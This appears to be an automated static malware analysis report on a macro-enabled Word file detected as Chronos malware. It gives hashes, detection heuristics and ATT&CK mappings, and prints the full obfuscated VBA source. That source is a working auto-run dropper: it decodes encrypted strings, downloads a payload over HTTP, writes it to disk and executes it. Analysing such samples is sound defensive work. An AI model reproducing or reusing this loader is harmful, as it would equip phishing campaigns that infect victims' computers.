Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3326a72ea7666a9b…

MALICIOUS

Office (OOXML)

31.9 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-24
MD5: 7d5351864220a1128a4b6096561312d0 SHA-1: caf2be6c02394ebffdd6605c73323dd4e5951dd2 SHA-256: 3326a72ea7666a9bfae92fd05ce3ff562edafff053ea0bfb7bb1f9ba3d1f9bbd
400 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

This OOXML document contains a VBA macro designed to execute upon opening, as indicated by the Document_Open macro firing and the critical heuristic for an obfuscated auto-exec loader. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The VBA script appears to be obfuscated and likely decodes or executes a payload, as suggested by the 'Deobfuscate/Decode Files or Information' technique.

Heuristics 12

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    GetObject 3, 10
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set SwvGbB0on56G = CreateObject(OSKjPtcCMdE6j(Chr(157) + Chr(149) + Chr(218) + Chr(30) + Chr(188) + Chr(102) + Chr(252) + Chr(195) + Chr(32) + Chr(209) + Chr(116) + Chr(18) + Chr(149) + Chr(91) + Chr(245) + Chr(13) + Chr(168), "PYDyPB7kA"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject 3, 10
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName RuN6PGqPh1t, 92, VbMethod, 14, 3, 37
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    IqHZePLJpKN = Environ(OSKjPtcCMdE6j(Chr(134) + Chr(236) + Chr(6) + Chr(219) + Chr(123) + Chr(223) + Chr(104), "IdExOiXbuurRfl8JM")) & "\" & S680eL5GmcJV3 & OSKjPtcCMdE6j(Chr(93) + Chr(0) + Chr(115) + Chr(210), "X98dnRg")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12439 bytes
SHA-256: 26d291ab79612f27e327a42a8edcd1f0e299215ea9dc7efe43f193ccb12fcfb1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
87 of 174 identifiers look randomly generated (e.g. 'IdExOiXbuurRfl8JM') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OSKjPtcCMdE6j(ByVal KOL3TzbwD As String, ByVal U8juuGt As String) As String
Dim POF4A6oZOYpH As Long, PIiN As Long
POF4A6oZOYpH = 70
PIiN = 68
If POF4A6oZOYpH + PIiN > 2 Then
PIiN = POF4A6oZOYpH + 7
Else
InputBox 12
End If
On Error Resume Next
Dim YdfLyn7 As Long, LseL9GUdM As Long
YdfLyn7 = 56
LseL9GUdM = 85
If YdfLyn7 + LseL9GUdM > 2 Then
LseL9GUdM = YdfLyn7 + 48
Else
InputBox 60
End If
Dim Qgp2tW1XRc(0 To 255) As Integer, Dv9WpG8 As Long, MGlrVhwFv02k6 As Long, XL5mwnTDLlB As Long, Tw1b3xXA9k() As Byte, Jq1nIcYlyu() As Byte, ArgVuwL08Y As Byte
Dim G3cnRP5jP As Long, B3OpOYBy1 As Long
G3cnRP5jP = 30
B3OpOYBy1 = 63
If G3cnRP5jP + B3OpOYBy1 > 2 Then
B3OpOYBy1 = G3cnRP5jP + 91
Else
InputBox 33
End If
Tw1b3xXA9k() = StrConv(U8juuGt, vbFromUnicode)
Dim Fl2zZQ As Long, VhSUBzJkEcK As Long
Fl2zZQ = 6
VhSUBzJkEcK = 37
If Fl2zZQ + VhSUBzJkEcK > 2 Then
VhSUBzJkEcK = Fl2zZQ + 44
Else
InputBox 49
End If
For Dv9WpG8 = 0 To 255
Qgp2tW1XRc(Dv9WpG8) = Dv9WpG8
Next Dv9WpG8
Dv9WpG8 = 0
MGlrVhwFv02k6 = 0
XL5mwnTDLlB = 0
For Dv9WpG8 = 0 To 255
MGlrVhwFv02k6 = (MGlrVhwFv02k6 + Qgp2tW1XRc(Dv9WpG8) + Tw1b3xXA9k(Dv9WpG8 Mod Len(U8juuGt))) Mod 256
ArgVuwL08Y = Qgp2tW1XRc(Dv9WpG8)
Qgp2tW1XRc(Dv9WpG8) = Qgp2tW1XRc(MGlrVhwFv02k6)
Qgp2tW1XRc(MGlrVhwFv02k6) = ArgVuwL08Y
Next Dv9WpG8
Dv9WpG8 = 0
MGlrVhwFv02k6 = 0
XL5mwnTDLlB = 0
Jq1nIcYlyu() = StrConv(KOL3TzbwD, vbFromUnicode)
For Dv9WpG8 = 0 To Len(KOL3TzbwD)
MGlrVhwFv02k6 = (MGlrVhwFv02k6 + 1) Mod 256
XL5mwnTDLlB = (XL5mwnTDLlB + Qgp2tW1XRc(MGlrVhwFv02k6)) Mod 256
ArgVuwL08Y = Qgp2tW1XRc(MGlrVhwFv02k6)
Qgp2tW1XRc(MGlrVhwFv02k6) = Qgp2tW1XRc(XL5mwnTDLlB)
Qgp2tW1XRc(XL5mwnTDLlB) = ArgVuwL08Y
Jq1nIcYlyu(Dv9WpG8) = Jq1nIcYlyu(Dv9WpG8) Xor (Qgp2tW1XRc((Qgp2tW1XRc(MGlrVhwFv02k6) + Qgp2tW1XRc(XL5mwnTDLlB)) Mod 256))
Next Dv9WpG8
Dim HbwDXb8IiAKE As Long, UJSE59WKx7 As Long
HbwDXb8IiAKE = 24
UJSE59WKx7 = 34
If HbwDXb8IiAKE + UJSE59WKx7 > 2 Then
UJSE59WKx7 = HbwDXb8IiAKE + 50
Else
InputBox 30
End If
OSKjPtcCMdE6j = StrConv(Jq1nIcYlyu, vbUnicode)
Dim PQ5lQOmMjV4O As Long, PayOeicY5V5ZC As Long
PQ5lQOmMjV4O = 3
PayOeicY5V5ZC = 46
If PQ5lQOmMjV4O + PayOeicY5V5ZC > 2 Then
PayOeicY5V5ZC = PQ5lQOmMjV4O + 15
Else
InputBox 35
End If
End Function
Sub XfQ6d01lVW()
Dim IJMFi7l5kZa As Long, GzGvJZRKtRG As Long
IJMFi7l5kZa = 45
GzGvJZRKtRG = 18
If IJMFi7l5kZa + GzGvJZRKtRG > 2 Then
GzGvJZRKtRG = IJMFi7l5kZa + 26
Else
InputBox 75
End If
GetObject 3, 10
IsError 15
If CBool(98) = True Then WALWj5a3iYn = 47
Switch 76
Reset
Load Tl81bW15Ru
Atn 62
O6yGN49go = EOF(31)
Sin 96
DateDiff "Gh14I733", 1, 41
Err.Clear
SeQg6R6lmyUY3s6G = Day(95)
IsDate 5
Join H5ShGMlGB8Kz, 31
Year 51
DateSerial 91, 17, 92
Hour 66
Month 19
KJTS00RZrA8bpmgc = Cos(10)
YjVTBvQJw2tK = CurDir
If IsMissing(61) = True Then BxWa5a = 59
If CByte(13) = True Then TnebhFxyzR9ho6 = 7711
If CCur(84) = True Then WzTtVPR6ZhqF = 9142
CallByName RuN6PGqPh1t, 92, VbMethod, 14, 3, 37
ChDrive 32
TimeSerial 75, 18, 65
TimeValue 49
MADNCH5ilmF = Fix(42)
LOF 64
Loc 97
Dim Ez1AQfpdHG As Long, Uzt0Om As Long
Ez1AQfpdHG = 51
Uzt0Om = 25
If Ez1AQfpdHG + Uzt0Om > 2 Then
Uzt0Om = Ez1AQfpdHG + 77
Else
InputBox 21
End If
End Sub
Sub Document_Open()
Dim AX61IeS9 As Long, XJ5boLgEHqvUq As Long
AX61IeS9 = 64
XJ5boLgEHqvUq = 78
If AX61IeS9 + XJ5boLgEHqvUq > 2 Then
XJ5boLgEHqvUq = AX61IeS9 + 10
Else
InputBox 61
End If
Dim Jsn9k8owxunZC8q As Long, NvBZK3zIWc As Long, GRzGFMvFAwTz5 As Long
Dim QO6ZorINUh0YxW As Long, MqK2vwpSFg As Long
QO6ZorINUh0YxW = 96
MqK2vwpSFg = 28
If QO6ZorINUh0YxW + MqK2vwpSFg > 2 Then
MqK2vwpSFg = QO6ZorINUh0YxW + 35
Else
InputBox 40
End If
Jsn9k8owxunZC8q = 985671669: NvBZK3zIWc = 0: GRzGFMvFAwTz5 = 0
Dim VTrknUphvS9Q As Long, Az0t4gJBe As Long
VTrknUphvS9Q = 71
Az0t4gJBe = 76
If VTrknUphvS9Q + Az0t4gJBe > 2 Then
Az0t4gJBe = VTrknUphvS9Q + 60
Else
InputBox 9
End If
For NvBZK3zIWc = 1 To Jsn9k8owxunZC8q
GRzGFMvFAwTz5 = GRzGFMvFAwTz5 + 1
Next NvBZK3zIWc
Dim Bfog350uASFg As Long, RggXXIVLXmXCm6uL As Long
Bfog350uASFg = 56
RggXXIVLXmXCm6uL = 75
If Bfog350uASFg + RggXXIVLXmXCm6uL > 2 Then
RggXXIVLXmXCm6uL = Bfog350uASFg + 16
Else
InputBox 42
End If
If GRzGFMvFAwTz5 = Jsn9k8owxunZC8q Then
Dim GpaLyXqhQFThTEH As Long, SOsKrSyfMiGu As Long
GpaLyXqhQFThTEH = 9
SOsKrSyfMiGu = 17
If GpaLyXqhQFThTEH + SOsKrSyfMiGu > 2 Then
SOsKrSyfMiGu = GpaLyXqhQFThTEH + 66
Else
InputBox 17
End If
CXwtya9R2HDcVRv
Dim CrCtO8nxmYwN As Long, C3vCslVbw As Long
CrCtO8nxmYwN = 83
C3vCslVbw = 41
If CrCtO8nxmYwN + C3vCslVbw > 2 Then
C3vCslVbw = CrCtO8nxmYwN + 92
Else
InputBox 65
End If
Else
Dim YhCAlhue03gy As Long, IpY As Long
YhCAlhue03gy = 28
IpY = 59
If YhCAlhue03gy + IpY > 2 Then
IpY = YhCAlhue03gy + 66
Else
InputBox 71
End If
XfQ6d01lVW
Dim N69fBeZQOx As Long, L0W8mAWuXf1e As Long
N69fBeZQOx = 11
L0W8mAWuXf1e = 1
If N69fBeZQOx + L0W8mAWuXf1e > 2 Then
L0W8mAWuXf1e = N69fBeZQOx + 57
Else
InputBox 60
End If
End If
Dim F3mPoe8fTvND1nM As Long, B3sO8rHE As Long
F3mPoe8fTvND1nM = 37
B3sO8rHE = 66
If F3mPoe8fTvND1nM + B3sO8rHE > 2 Then
B3sO8rHE = F3mPoe8fTvND1nM + 7
Else
InputBox 10
End If
End Sub
Function S680eL5GmcJV3() As String
Dim FsA4evR73T0kUYz As Long, SwA3dRkK25PxEFb As Long
FsA4evR73T0kUYz = 47
SwA3dRkK25PxEFb = 64
If FsA4evR73T0kUYz + SwA3dRkK25PxEFb > 2 Then
SwA3dRkK25PxEFb = FsA4evR73T0kUYz + 11
Else
InputBox 1
End If
Dim Qudp0Qn02DZr() As Byte, SeLIXVSU5mCfYj() As Byte, VAH8dh As Long, UQEgAoZO0eF As Long, GLDaUyLSLF9jOq23 As String, WMznZC8q As String, OIjfDSCxQ As Long
Dim VGNZmTQdrHE As Long, YEFbhc As Long
VGNZmTQdrHE = 83
YEFbhc = 80
If VGNZmTQdrHE + YEFbhc > 2 Then
YEFbhc = VGNZmTQdrHE + 89
Else
InputBox 61
End If
OIjfDSCxQ = 0
Dim Uynb32Df9zfSWFh6 As Long, RIz8B4tyYxYVtd As Long
Uynb32Df9zfSWFh6 = 70
RIz8B4tyYxYVtd = 94
If Uynb32Df9zfSWFh6 + RIz8B4tyYxYVtd > 2 Then
RIz8B4tyYxYVtd = Uynb32Df9zfSWFh6 + 48
Else
InputBox 86
End If
GtQDqLJy9NdAA3:
Dim JPH7His As Long, EDPYNrHqcppN As Long
JPH7His = 95
EDPYNrHqcppN = 45
If JPH7His + EDPYNrHqcppN > 2 Then
EDPYNrHqcppN = JPH7His + 95
Else
InputBox 18
End If
Randomize
WMznZC8q = Int(30 * Rnd)
If WMznZC8q < 4 Then GoTo GtQDqLJy9NdAA3
OIjfDSCxQ = WMznZC8q
If OIjfDSCxQ > 0& Then
Dim SoqicL2oe As Long, AhopumSNxgZEdv As Long
SoqicL2oe = 88
AhopumSNxgZEdv = 75
If SoqicL2oe + AhopumSNxgZEdv > 2 Then
AhopumSNxgZEdv = SoqicL2oe + 89
Else
InputBox 48
End If
GLDaUyLSLF9jOq23 = OSKjPtcCMdE6j(Chr(138) + Chr(30) + Chr(209) + Chr(231) + Chr(16) + Chr(217) + Chr(81) + Chr(168) + Chr(224) + Chr(199), "DFbhcc4VoI")
Randomize
Qudp0Qn02DZr = GLDaUyLSLF9jOq23
VAH8dh = Len(GLDaUyLSLF9jOq23) - 1&
OIjfDSCxQ = (OIjfDSCxQ * 2&) - 1&
ReDim SeLIXVSU5mCfYj(OIjfDSCxQ) As Byte
Dim TkJEnaQ9RpAt2Op9n As Long, W9NPAQVShag As Long
TkJEnaQ9RpAt2Op9n = 29
W9NPAQVShag = 81
If TkJEnaQ9RpAt2Op9n + W9NPAQVShag > 2 Then
W9NPAQVShag = TkJEnaQ9RpAt2Op9n + 97
Else
InputBox 22
End If
For UQEgAoZO0eF = 0& To OIjfDSCxQ Step 2&
SeLIXVSU5mCfYj(UQEgAoZO0eF) = Qudp0Qn02DZr(CLng(VAH8dh * Rnd) * 2&)
Next
Dim Payf5HA As Long, TZ6TFMDw2Q0 As Long
Payf5HA = 50
TZ6TFMDw2Q0 = 17
If Payf5HA + TZ6TFMDw2Q0 > 2 Then
TZ6TFMDw2Q0 = Payf5HA + 17
Else
InputBox 92
End If
End If
Dim PSF26mT As Long, BzOndDgM0lxw As Long
PSF26mT = 69
BzOndDgM0lxw = 59
If PSF26mT + BzOndDgM0lxw > 2 Then
BzOndDgM0lxw = PSF26mT + 16
Else
InputBox 20
End If
S680eL5GmcJV3 = SeLIXVSU5mCfYj
Dim RWjOa8XqGD9 As Long, BJ935VzW6 As Long
RWjOa8XqGD9 = 75
BJ935VzW6 = 68
If RWjOa8XqGD9 + BJ935VzW6 > 2 Then
BJ935VzW6 = RWjOa8XqGD9 + 90
Else
InputBox 96
End If
End Function
Sub L4HKO4q4b1(VnFa35qS As Long)
Dim Pkrx6EPe3Vkvc6S As Long, YCfqQNNAu As Long
Pkrx6EPe3Vkvc6S = 89
YCfqQNNAu = 72
If Pkrx6EPe3Vkvc6S + YCfqQNNAu > 2 Then
YCfqQNNAu = Pkrx6EPe3Vkvc6S + 98
Else
InputBox 19
End If
Dim WAbFKEe As Long
Dim O0tiCO As Long, DboMV As Long
O0tiCO = 58
DboMV = 55
If O0tiCO + DboMV > 2 Then
DboMV = O0tiCO + 64
Else
InputBox 36
End If
WAbFKEe = Timer + VnFa35qS
Do While Timer < WAbFKEe
DoEvents
Loop
Dim Pq1BkBD2 As Long, OeJu23xo As Long
Pq1BkBD2 = 97
OeJu23xo = 36
If Pq1BkBD2 + OeJu23xo > 2 Then
OeJu23xo = Pq1BkBD2 + 47
Else
InputBox 62
End If
End Sub
Sub CXwtya9R2HDcVRv()
Dim FPDT As Long, LqmSrzWOo7N As Long
FPDT = 27
LqmSrzWOo7N = 75
If FPDT + LqmSrzWOo7N > 2 Then
LqmSrzWOo7N = FPDT + 76
Else
InputBox 28
End If
Dim IqHZePLJpKN As String, SwvGbB0on56G As Object, YOcpKu4FN As Integer
Dim SK6Fc As Long, QUC0vmluDE As Long
SK6Fc = 58
QUC0vmluDE = 27
If SK6Fc + QUC0vmluDE > 2 Then
QUC0vmluDE = SK6Fc + 48
Else
InputBox 59
End If
IqHZePLJpKN = Environ(OSKjPtcCMdE6j(Chr(134) + Chr(236) + Chr(6) + Chr(219) + Chr(123) + Chr(223) + Chr(104), "IdExOiXbuurRfl8JM")) & "\" & S680eL5GmcJV3 & OSKjPtcCMdE6j(Chr(93) + Chr(0) + Chr(115) + Chr(210), "X98dnRg")
Dim Lwh9hORflM As Long, UeFK9KofAjEl1s As Long
Lwh9hORflM = 18
UeFK9KofAjEl1s = 13
If Lwh9hORflM + UeFK9KofAjEl1s > 2 Then
UeFK9KofAjEl1s = Lwh9hORflM + 2
Else
InputBox 36
End If
Set SwvGbB0on56G = CreateObject(OSKjPtcCMdE6j(Chr(157) + Chr(149) + Chr(218) + Chr(30) + Chr(188) + Chr(102) + Chr(252) + Chr(195) + Chr(32) + Chr(209) + Chr(116) + Chr(18) + Chr(149) + Chr(91) + Chr(245) + Chr(13) + Chr(168), "PYDyPB7kA"))
Dim CrUCjmCKSVKMRYK As Long, I9yC9KuEh1F3zEo As Long
CrUCjmCKSVKMRYK = 55
I9yC9KuEh1F3zEo = 29
If CrUCjmCKSVKMRYK + I9yC9KuEh1F3zEo > 2 Then
I9yC9KuEh1F3zEo = CrUCjmCKSVKMRYK + 80
Else
InputBox 24
End If
SwvGbB0on56G.Open OSKjPtcCMdE6j(Chr(49) + Chr(102) + Chr(76), "JpxGsKLacJu"), OSKjPtcCMdE6j(Chr(141) + Chr(22) + Chr(128) + Chr(226) + Chr(57) + Chr(185) + Chr(167) + Chr(66) + Chr(66) + Chr(243) + Chr(16) + Chr(127) + Chr(54) + Chr(108) + Chr(179) + Chr(101) + Chr(123) + Chr(162) + Chr(153) + Chr(218) + Chr(127) + Chr(70) + Chr(246) + Chr(192) + Chr(158) + Chr(180) + Chr(84), "LliA27PvNSHbqS"), False
Dim JYGWNxZ As Long, HcVcCnhMawmmcG As Long
JYGWNxZ = 16
HcVcCnhMawmmcG = 91
If JYGWNxZ + HcVcCnhMawmmcG > 2 Then
HcVcCnhMawmmcG = JYGWNxZ + 91
Else
InputBox 44
End If
SwvGbB0on56G.setRequestHeader OSKjPtcCMdE6j(Chr(4) + Chr(35) + Chr(243) + Chr(246) + Chr(24) + Chr(220) + Chr(9) + Chr(203) + Chr(252) + Chr(227), "KIFY5MMYDGkJlS"), OSKjPtcCMdE6j(Chr(197) + Chr(75) + Chr(53) + Chr(86) + Chr(108) + Chr(157) + Chr(91) + Chr(101) + Chr(252) + Chr(193) + Chr(190), "IXNI9u8cZk1YRp8e1")
SwvGbB0on56G.send
If SwvGbB0on56G.readyState = 4 And SwvGbB0on56G.Status = 200 Then
Dim K1ayon9AA As Long, HWdxxXVo As Long
K1ayon9AA = 21
HWdxxXVo = 31
If K1ayon9AA + HWdxxXVo > 2 Then
HWdxxXVo = K1ayon9AA + 47
Else
InputBox 27
End If
YOcpKu4FN = FreeFile
Open IqHZePLJpKN For Binary Access Write Lock Write As #YOcpKu4FN
Put #YOcpKu4FN, , OSKjPtcCMdE6j(StrConv(SwvGbB0on56G.ResponseBody, vbUnicode), OSKjPtcCMdE6j(Chr(227) + Chr(134) + Chr(117) + Chr(46) + Chr(111) + Chr(20) + Chr(236) + Chr(75) + Chr(79), "SQj4RQbQ"))
Close #YOcpKu4FN
Dim XhORflMe1BJlu4C As Long, BJAwXU1PY As Long
XhORflMe1BJlu4C = 31
BJAwXU1PY = 74
If XhORflMe1BJlu4C + BJAwXU1PY > 2 Then
BJAwXU1PY = XhORflMe1BJlu4C + 43
Else
InputBox 64
End If
L4HKO4q4b1 1
Dim Wd86Lg7QmKY As Long, ENP3MK As Long
Wd86Lg7QmKY = 29
ENP3MK = 53
If Wd86Lg7QmKY + ENP3MK > 2 Then
ENP3MK = Wd86Lg7QmKY + 8
Else
InputBox 45
End If
CreateObject(OSKjPtcCMdE6j(Chr(129) + Chr(215) + Chr(193) + Chr(38) + Chr(218) + Chr(115) + Chr(35) + Chr(90) + Chr(159) + Chr(83) + Chr(252) + Chr(0) + Chr(211), "F1eQ91DNjdd")).exec """" & IqHZePLJpKN & """"
Dim BP2bCZaL0s As Long, TsROzYqU As Long
BP2bCZaL0s = 45
TsROzYqU = 33
If BP2bCZaL0s + TsROzYqU > 2 Then
TsROzYqU = BP2bCZaL0s + 68
Else
InputBox 62
End If
End If
Dim W1LBosA As Long, O0vbeO As Long
W1LBosA = 38
O0vbeO = 94
If W1LBosA + O0vbeO > 2 Then
O0vbeO = W1LBosA + 97
Else
InputBox 60
End If
Set SwvGbB0on56G = Nothing
Dim B1fJaNDOc4z As Long, GRVM8W8ABm4fN As Long
B1fJaNDOc4z = 91
GRVM8W8ABm4fN = 79
If B1fJaNDOc4z + GRVM8W8ABm4fN > 2 Then
GRVM8W8ABm4fN = B1fJaNDOc4z + 15
Else
InputBox 10
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 17e6c16aa3ad2d96d1eba2512463e475ab89c415074577e2847204a4b87c8dac
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.